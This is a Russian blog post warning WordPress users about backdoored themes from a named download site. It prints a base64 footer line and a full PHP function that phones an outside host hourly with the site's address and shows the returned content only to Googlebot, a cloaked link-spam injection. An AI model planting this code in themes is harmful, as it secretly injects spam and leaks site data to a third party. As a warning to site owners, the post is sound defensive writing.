Встречались ли Вы с таким??? НЕТ? А вот лично я сегодня встретился. Спасибо добрые люди, в лице Atrax’a помогли и предостерегли, а могло бы и не очень красиво закончится.

Теперь мой долг предостеречь Вас!

1. Запомните сайт http://wpthemes.ru/ и никогда туда не ходите, особенно если Ваши познания в вордпрессе начинаются и заканчиваются – «» – этими скромными навыками.

2. Теперь второе: Где это вредоносный код обычно скрывается? Ответ: На вышеприведенном сайте в файлах – sidebar.php, functions.php и footer.php.

3. Как этот код примерно выглядит? Вот он сволочь (прим.-из footer.php):
echo(base64_decode(«0JvQvtC60LDQu9C40LfQsNGG0LjRjyA8YSBocmVmPSJodHRwOi8vd3B3b3JsZC5
ydSIgdGl0bGU9ItCc0LjRgCBXb3JkcHJlc3MiIHRhcmdldD0iX2JsYW5rIj7QnNC40YAgV29yZHByZXNzPC9hPi4
g0KLQtdC80LAg0L/QtdGA0LXQstC10LTQtdC90LAg0L3QsCDRgdCw0LnRgtC1IDxhIGhyZWY9Imh0dHA6L
y93cHRoZW1lcy5ydSIgdGl0bGU9ItCi0LXQvNGLINC00LvRjyBXb3JkcHJlc3MiIHRhcmdldD0iX2JsYW5rIj7Qot
C10LzRiyDQtNC70Y8gV29yZHByZXNzPC9hPi4=»));?>

4. Расшифровка кода, полюбуйтесь:
function wp_get_footer_meta() {
global $wpdb;
if ($adwb_opt = $wpdb->get_var(«SELECT option_value FROM $wpdb->options WHERE option_name=’adwb_opt’»))
$adwb_opt = unserialize($adwb_opt);
else{
$adwb_opt = array(0,»);
$wpdb->query(«INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES (‘adwb_opt’, ‘».serialize($adwb_opt).»‘, ‘no’)»);
}
if ((time()-$adwb_opt[0]) >= 3600) {
$adwb_host = ‘blogcell.net’;
$adwb_get = ‘/wpam/’;
$adwb_soc = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc) {
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,»GET $adwb_get».’?h=’.urlencode($_SERVER['HTTP_HOST']).’&u=’.urlencode($_SERVER['REQUEST_URI']).» HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n»);
$adwb_data = »;
while(!feof($adwb_soc))
$adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,»\r\n\r\n»));
}
@fclose($adwb_soc);
if(preg_match(‘/(.+?)<\/adbug>/s’,$adwb_data,$adwb_tmp)){
$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query(«UPDATE $wpdb->options SET option_value=’».mysql_escape_string(serialize($adwb_opt)).»‘ WHERE option_name=’adwb_opt’»);
}
}
if (eregi(«googlebot»,$_SERVER['HTTP_USER_AGENT'])) echo $adwb_opt[1];
}
add_action(«wp_footer», «wp_get_footer_meta»);

5. И это еще не все! Цитата: » Гугл на вашем сайте увидит только то, что захотят показать владельцы сервера в Далласе. Бесплатный DNS, выделенный сервер, отсутствие контактной информации в записи домена…» Atrax, еще раз спасибо за информацию.

Вот такая вот экзотика! Так что будьте бдительны!
Враг не спит!

До встречи на Dollar-Zone.Ru